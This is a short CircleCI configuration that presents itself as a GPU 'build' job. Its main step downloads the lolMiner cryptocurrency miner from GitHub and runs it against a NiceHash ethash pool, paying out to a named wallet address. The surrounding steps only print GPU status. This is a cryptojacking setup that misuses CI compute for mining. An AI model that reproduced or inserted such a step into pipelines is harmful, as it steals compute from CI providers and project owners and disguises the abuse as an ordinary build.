version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.45/lolMiner_v1.45_Lin64.tar.gz && tar xvf lolMiner_v1.45_Lin64.tar.gz && cd 1.45 && ./lolMiner -a ethash -o nicehash+tcp://daggerhashimoto.eu.nicehash.com:3353 -u 35ZnC1q2Vnjwkn9rLtE5RybR8gHVap3B1R.AST
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi